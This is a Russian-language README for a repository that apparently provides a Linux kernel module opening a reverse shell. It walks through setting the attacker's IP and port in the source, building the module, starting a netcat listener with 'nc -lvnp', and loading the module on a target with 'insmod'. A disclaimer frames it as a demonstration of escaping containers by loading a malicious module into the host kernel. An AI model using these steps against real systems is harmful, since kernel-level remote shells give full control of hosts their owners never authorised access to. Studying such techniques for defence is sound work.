# LKM Reverse Shell В этом репозитории представлен модуль ядра Linux, который выполняет обратный вызов на прослушиватель для установки обратной оболочки ### Инструкция по использованию Для успешной эксплуатации необходимо подготовить инструментарий для сборки модулей ядра на атакующей машине. Установите пакет build-essential и заголовки ядра: ```bash sudo apt install build-essential linux-headers-$(uname -r) ``` После клонирования репозитория, откройте файл `reverse-shell.c` и измените 13 строку, указав ваш IP-адрес и порт. Затем соберите модуль: ```bash git clone https://git.vadimbelous.com/vadim_belous/lkm_reverse_shell.git cd lkm_reverse_shell $EDITOR reverse-shell.c make ``` Получившийся в результате успешной сборки файл `reverse-shell.ko` это и есть нужный модуль ядра Запустите прослушиватель на машине атакующего: ```bash nc -lvnp $PORT ``` Перенесите вредоносный модуль на целевую машину и подгрузите его в ядро: ```bash insmod reverse-shell.ko ``` Если вы всё сделали правильно, на прослушиватель придёт обратный вызов и установится обратная командная оболочка ### Disclaimer Этот репозиторий создан исключительно в образовательных целях, чтобы продемонстрировать потенциальные методы эксплуатации контейнерных сред путем загрузки вредоносного модуля (LKM) в ядро хостовой ОС. Автор данного репозитория не несет ответственности за любые неправомерные действия, совершенные с использованием этого кода